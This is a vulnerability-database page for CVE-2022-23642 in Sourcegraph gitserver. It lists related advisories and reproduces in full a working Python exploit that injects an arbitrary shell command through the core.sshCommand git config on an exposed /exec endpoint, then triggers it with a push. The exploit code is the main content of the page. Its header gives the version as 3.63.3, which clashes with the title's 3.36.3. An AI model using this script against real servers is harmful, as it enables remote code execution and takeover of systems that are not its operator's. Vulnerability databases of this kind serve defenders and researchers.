Vulners
Lucene search
Sourcegraph Gitserver 3.36.3 Remote Code Execution
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | Sourcegraph Gitserver 3.36.3 - Remote Code Execution Exploit | 14 Jun 202200:00 | – | zdt |
| Sourcegraph gitserver sshCommand Remote Command Execution Exploit | 14 Jul 202200:00 | – | zdt |
 | Exploit for Code Injection in Sourcegraph | 10 Jun 202206:12 | – | githubexploit |
 | The vulnerability of the gitserver service in the Sourcegraph search and navigation system, related to improper code generation management, allows a violator to execute arbitrary code. | 23 Jun 202200:00 | – | bdu_fstec |
 | CVE-2022-23642 | 19 Feb 202202:38 | – | circl |
 | Sourcegraph 代码注入漏洞 | 18 Feb 202200:00 | – | cnnvd |
 | Sourcegraph code injection vulnerability | 22 Feb 202200:00 | – | cnvd |
 | Sourcegraph Command Injection (CVE-2022-23642) | 20 Jul 202200:00 | – | checkpoint_advisories |
 | CVE-2022-23642 | 18 Feb 202222:15 | – | cve |
 | CVE-2022-23642 Code Injection in Sourcegraph | 18 Feb 202222:15 | – | cvelist |
10
`# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.63.3
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3
# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service.
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph
import json
import argparse
import requests
def exploit(host, existing_git, cmd):
# setting sshCommand
data = {
"Repo" : existing_git,
"Args" : [
"config",
"core.sshCommand",
cmd
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# setting fake origin
data = {
"Repo" : existing_git,
"Args" : [
"remote",
"add",
"origin",
"git@lolololz:foo/bar.git"
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# triggering command using push
data = {
"Repo" : existing_git,
"Args" : [
"push",
"origin",
"master"
]
}
res = requests.get(host+"/exec", json=data).text
print("[*] Finished executing exploit")
parser = argparse.ArgumentParser()
parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()
host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd
exploit(host, existing_git, cmd)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jun 2022 00:00Current
CVSS 26
CVSS 3.18.8
EPSS0.85278
SSVC